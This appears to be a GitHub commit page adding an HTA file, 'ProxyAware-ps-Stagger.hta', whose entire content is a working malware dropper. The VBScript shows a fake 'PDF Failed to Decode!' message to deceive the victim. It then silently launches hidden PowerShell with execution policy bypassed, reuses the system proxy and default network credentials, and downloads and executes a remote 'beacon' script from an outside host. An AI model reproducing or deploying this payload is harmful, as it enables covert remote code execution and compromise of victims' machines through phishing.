Skip to content

Commit 14e8880

Browse files
Create ProxyAware-ps-Stagger.hta
1 parent 6e158ea commit 14e8880

File tree

1 file changed

+17
-0
lines changed

1 file changed

+17
-0
lines changed

ProxyAware-ps-Stagger.hta

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
<script language="VBScript">
2+
Function var_func()
3+
Dim var_shell
4+
Set var_shell = CreateObject("Wscript.Shell")
5+
var_shell.run "cmd.exe /c powershell.exe -exec bypass -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX ($wc.downloadstring('http://site.org/beacon'))", 0, true
6+
# Beacon is a Fully Staged .ps1
7+
End Function
8+
9+
Function TestBox()
10+
Msgbox "Client name (PDF Failed to Decode!)"
11+
End Function
12+
13+
TestBox
14+
var_func
15+
16+
self.close
17+
</script>

0 commit comments

Comments
 (0)